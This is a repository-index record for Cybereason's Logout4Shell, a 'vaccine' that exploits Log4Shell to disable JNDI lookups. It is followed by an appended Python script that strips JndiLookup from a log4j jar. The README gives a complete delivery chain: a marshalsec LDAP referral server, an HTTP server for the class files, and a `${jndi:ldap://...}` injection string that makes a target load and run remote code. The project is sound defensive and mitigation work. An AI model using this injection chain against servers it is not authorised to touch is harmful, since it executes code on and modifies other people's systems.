{"id":13482494,"url":"https://github.com/Cybereason/Logout4Shell","last_synced_at":"2025-03-27T13:31:56.307Z","repository":{"id":45370897,"uuid":"437132269","full_name":"Cybereason/Logout4Shell","owner":"Cybereason","description":"Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell","archived":false,"fork":false,"pushed_at":"2021-12-22T02:02:58.000Z","size":106,"stargazers_count":1708,"open_issues_count":1,"forks_count":111,"subscribers_count":24,"default_branch":"main","last_synced_at":"2025-03-25T07:08:37.113Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Cybereason.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-10T22:38:53.000Z","updated_at":"2025-03-22T10:41:21.000Z","dependencies_parsed_at":"2022-09-24T12:03:12.706Z","dependency_job_id":null,"html_url":"https://github.com/Cybereason/Logout4Shell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cybereason%2FLogout4Shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cybereason%2FLogout4Shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cybereason%2FLogout4Shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cybereason%2FLogout4Shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Cybereason","download_url":"https://codeload.github.com/Cybereason/Logout4Shell/tar.gz/refs/heads/main","host":{"name":"GitH
ub","url":"https://github.com","kind":"github","repositories_count":245854448,"owners_count":20683356,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T17:01:02.557Z","updated_at":"2025-03-27T13:31:56.272Z","avatar_url":"https://github.com/Cybereason.png","language":"Java","funding_links":[],"categories":["Java"],"sub_categories":[],"readme":"# Logout4Shell\n![logo](https://github.com/Cybereason/Logout4Shell/raw/main/assets/CR_logo.png)\n\n## Description\n\nA vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s GitHub on December 9, 2021. \nThe flaw has been dubbed “Log4Shell” and has the highest possible severity rating of 10. Software made or\nmanaged by the Apache Software Foundation (from here on just \"Apache\") is pervasive, and Log4j in particular is embedded\nin a large share of Java server applications, making this a potentially catastrophic flaw.\nThe Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerable servers.\n\n\nWhile the best mitigation against these vulnerabilities is to upgrade log4j to\n~~2.15.0~~2.17.0 or above, the lookup behavior can be partially mitigated (see below) by\nsetting the system property `log4j2.formatMsgNoLookups` to `true` (Log4j \u003e= 2.10 only) or, on any 2.x version, by removing\nthe `JndiLookup` class from the classpath. \n\nOn 12/14/2021 the Apache Software Foundation disclosed CVE-2021-45046, which was patched in log4j version 2.16.0. 
This\nvulnerability showed that in certain scenarios, for example where attackers can control a thread-context variable that\ngets logged, even the flag `log4j2.formatMsgNoLookups` is insufficient to mitigate Log4Shell. An\nadditional, less severe CVE, CVE-2021-45105, was then discovered. This vulnerability exposes the server to\nan infinite recursion that could crash the server in some scenarios. It is recommended to upgrade to\n2.17.0.\n\nHowever, setting this system property requires access to the vulnerable servers as well as a restart. \nThe [Cybereason](https://www.cybereason.com) research team has developed the\nfollowing code, which _exploits_ the same vulnerability; its payload\ndisables the vulnerable lookup setting. The payload then searches\nfor all `LoggerContext` instances and removes the JNDI entry from each `Interpolator`, preventing even recursive abuses. \nThis effectively blocks any further attempt to exploit Log4Shell on this server. \n\nThis Proof of Concept is based on [@tangxiaofeng7](https://github.com/tangxiaofeng7)'s [tangxiaofeng7/apache-log4j-poc](https://github.com/tangxiaofeng7/apache-log4j-poc).\n\nHowever, this project attempts to fix the vulnerability by using the bug against itself.\nYou can learn more about Cybereason's \"vaccine\" approach to the Apache Log4Shell vulnerability (CVE-2021-44228) on our website.\n\nLearn more: [Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228)](https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228)\n\n## Supported versions\nLogout4Shell supports log4j versions 2.0 through 2.14.1.\n\n## How it works\nOn log4j versions (\u003e= 2.10.0) that support the `FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS` setting, the payload sets this value\nto `true`, disabling lookups in logged message text. 
As disclosed in CVE-2021-45046, setting this flag is insufficient,\ntherefore the payload searches all existing `LoggerContext`s and removes the JNDI key from the `Interpolator` used to\nprocess `${}` fields. This means that even nested or recursive lookups that reach the JNDI mechanism will fail.\nIn persistent mode, the log4j jar file is then rebuilt and patched. The patch is included in this\ngit repository; however, it is not needed in the final build because the actual patch\nis embedded in the payload as Base64.\n\nIn persistent mode (see [below](#transient-vs-persistent-mode)), the payload additionally attempts to locate `log4j-core.jar`,\nremove the `JndiLookup` class, and modify the PluginCache (`Log4j2Plugins.dat`) to completely remove the JNDI plugin. Upon subsequent JVM\nrestarts the `JndiLookup` class cannot be found and log4j will no longer support JNDI lookups.\n\n## Transient vs Persistent mode\nThis package generates two flavors of the payload, Transient and Persistent. \nIn Transient mode, the payload modifies only\nthe currently running JVM. The payload is deliberately minimal and touches only the logger context and configuration. We thus\nbelieve the risk of using Transient mode on production environments is very low.\n\nPersistent mode performs all the changes of Transient mode and *in addition* searches for the jar from which `log4j`\nloads the `JndiLookup` class. It then attempts to modify this jar by removing the `JndiLookup` class as well as\nmodifying the plugin registry. There is inherently more risk in this approach: if `log4j-core.jar` becomes\ncorrupted, the application may fail to start the next time the JVM is launched.\n\nThe mode is selected by the URL given in step [2.4](#execution) below. The\nclass `Log4jRCETransient` selects Transient mode and the class `Log4jRCEPersistent` selects Persistent mode.\n\nPersistent mode is based on the work of [TudbuT](https://github.com/TudbuT). Thank you!\n\n## How to use\n\n1. 
Download this repository and build it\n\n   1.1 `git clone https://github.com/cybereason/Logout4Shell.git`\n\n   1.2 build it - `mvn package`\n\n   1.3 `cd target/classes`\n\n   1.4 run the webserver - `python3 -m http.server 8888`\n\n2. Download, build and run Marshalsec's LDAP server\n\n   2.1 `git clone https://github.com/mbechler/marshalsec.git`\n\n   2.2 `mvn package -DskipTests`\n   \n   2.3 `cd target`\n\n   2.4 \u003ca name=\"execution\"\u003e\u003c/a\u003e`java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer \"http://\u003cIP_OF_PYTHON_SERVER_FROM_STEP_1\u003e:8888/#Log4jRCE\u003cTransient/Persistent\u003e\"`\n\n3. To immunize a server\n\n   3.1 enter `${jndi:ldap://\u003cIP_OF_LDAP_SERVER_FROM_STEP_2\u003e:1389/a}` into a vulnerable field (such as user name)\n\nNote: the payload only fires if the injected string actually reaches a log4j call on the target, and the target must be able to\nreach both the LDAP server (port 1389) and the web server (port 8888). This delivery method also relies on the target JVM loading a\nremote class from the LDAP-referenced codebase, which JDK 8u191, 11.0.1 and later block by default\n(`com.sun.jndi.ldap.object.trustURLCodebase=false`); on such JVMs the class is not loaded by this route. To verify the result,\nlog another `${jndi:ldap://...}` probe and confirm that no connection reaches the LDAP server.\n\n\n## DISCLAIMER: \nThe code described in this advisory (the “Code”) is provided on an “as is” and\n“as available” basis and may contain bugs, errors and other defects. You are\nadvised to safeguard important data and to use caution. By using this Code, you\nagree that Cybereason shall have no liability to you for any claims in\nconnection with the Code. Cybereason disclaims any liability for any direct,\nindirect, incidental, punitive, exemplary, special or consequential damages,\neven if Cybereason or its related parties are advised of the possibility of\nsuch damages. Cybereason undertakes no duty to update the Code or this\nadvisory.\n\n## License\nThe source code for this project is licensed under the MIT license, which you can find in the LICENSE file.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FCybereason%2FLogout4Shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FCybereason%2FLogout4Shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FCybereason%2FLogout4Shell/lists"}
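The persistent-mode jar changes described in the README above under "How it works" and "Transient vs Persistent mode" (remove `JndiLookup.class`, then strip the JNDI entry from the plugin cache), done offline as an added Python example. This is not code from the Logout4Shell project, whose payload performs the same edit from inside the exploited JVM. It assumes the plugin cache lives at `META-INF/org/apache/logging/log4j/core/config/plugins/Log4j2Plugins.dat` in the layout written by log4j's `PluginCache.writeCache` (an `int` category count; per category a `writeUTF` name and `int` entry count; per entry `writeUTF` key, class name and plugin name followed by two booleans), that those strings are ASCII, and it builds a small constructed stand-in jar inline so it runs without a real log4j build.

```python
# Added example, not code from the Logout4Shell project (whose payload runs
# inside the victim JVM). This does the persistent-mode jar surgery offline:
# drop JndiLookup.class from a log4j-core jar and delete the "jndi" entry
# from the plugin cache so the lookup is not registered on the next start.
import io
import struct
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
PLUGIN_CACHE = "META-INF/org/apache/logging/log4j/core/config/plugins/Log4j2Plugins.dat"


def _read_utf(buf):
    # DataInputStream.readUTF: 2-byte big-endian length, then modified UTF-8.
    # Assumption: plugin keys and class names are ASCII, where that equals UTF-8.
    (n,) = struct.unpack(">H", buf.read(2))
    return buf.read(n).decode("utf-8")


def _write_utf(out, s):
    data = s.encode("utf-8")
    out.write(struct.pack(">H", len(data)))
    out.write(data)


def parse_plugin_cache(data):
    """Decode Log4j2Plugins.dat (layout of PluginCache.writeCache) into
    {category: {key: (class_name, name, printable, defer)}}."""
    buf = io.BytesIO(data)
    (ncat,) = struct.unpack(">i", buf.read(4))
    cats = {}
    for _ in range(ncat):
        cat = _read_utf(buf)
        (nplug,) = struct.unpack(">i", buf.read(4))
        entries = {}
        for _ in range(nplug):
            key, class_name, name = _read_utf(buf), _read_utf(buf), _read_utf(buf)
            printable, defer = struct.unpack(">??", buf.read(2))
            entries[key] = (class_name, name, printable, defer)
        cats[cat] = entries
    return cats


def serialize_plugin_cache(cats):
    """Inverse of parse_plugin_cache; emits the byte layout log4j reads back."""
    out = io.BytesIO()
    out.write(struct.pack(">i", len(cats)))
    for cat, entries in cats.items():
        _write_utf(out, cat)
        out.write(struct.pack(">i", len(entries)))
        for key, (class_name, name, printable, defer) in entries.items():
            for s in (key, class_name, name):
                _write_utf(out, s)
            out.write(struct.pack(">??", printable, defer))
    return out.getvalue()


def read_plugin_cache(jar_bytes):
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        return parse_plugin_cache(jar.read(PLUGIN_CACHE))


def inspect_jar(jar_bytes):
    """The before/after check: is JNDI still reachable from this jar on disk?"""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        cats = parse_plugin_cache(jar.read(PLUGIN_CACHE)) if PLUGIN_CACHE in names else {}
    registered = any("jndi" in v for k, v in cats.items() if k.lower() == "lookup")
    return {"jndi_class_present": JNDI_CLASS in names, "jndi_lookup_registered": registered}


def vaccinate_jar(jar_bytes):
    """Return (patched jar bytes, report of what was removed). Safe to re-run."""
    report = {"class_removed": False, "plugin_removed": False}
    dst_buf = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(dst_buf, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                report["class_removed"] = True
                continue  # dropped: the Interpolator can no longer instantiate it
            payload = src.read(info)
            if info.filename == PLUGIN_CACHE:
                cats = parse_plugin_cache(payload)
                for cat, entries in cats.items():
                    if cat.lower() == "lookup" and entries.pop("jndi", None) is not None:
                        report["plugin_removed"] = True
                payload = serialize_plugin_cache(cats)
            dst.writestr(info, payload)  # keeps entry name, method and timestamp
    return dst_buf.getvalue(), report


def build_sample_jar():
    """Constructed stand-in for log4j-core.jar (not a real log4j build): dummy
    class files plus a plugin cache registering two lookups and one appender."""
    cats = {
        "lookup": {
            "jndi": ("org.apache.logging.log4j.core.lookup.JndiLookup", "jndi", True, False),
            "date": ("org.apache.logging.log4j.core.lookup.DateLookup", "date", True, False),
        },
        "core": {
            "console": ("org.apache.logging.log4j.core.appender.ConsoleAppender", "Console", True, False),
        },
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # classfile magic only
        jar.writestr("org/apache/logging/log4j/core/lookup/DateLookup.class", b"\xca\xfe\xba\xbe")
        jar.writestr(PLUGIN_CACHE, serialize_plugin_cache(cats))
    return buf.getvalue()


if __name__ == "__main__":
    jar = build_sample_jar()
    print("before:", inspect_jar(jar))
    patched, report = vaccinate_jar(jar)
    print("report:", report, "after:", inspect_jar(patched))
```

On a real `log4j-core-2.x.jar`, read the file bytes into `vaccinate_jar`, write the result to a new path, run `inspect_jar` on that file, and only then swap it in; keep the original, since, as the README warns, a damaged jar means the application will not start. Apache's own `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class` removes only the class and leaves the cache entry, which log4j tolerates by skipping a plugin whose class it cannot load; removing the entry as well, as persistent mode does, leaves no dangling reference.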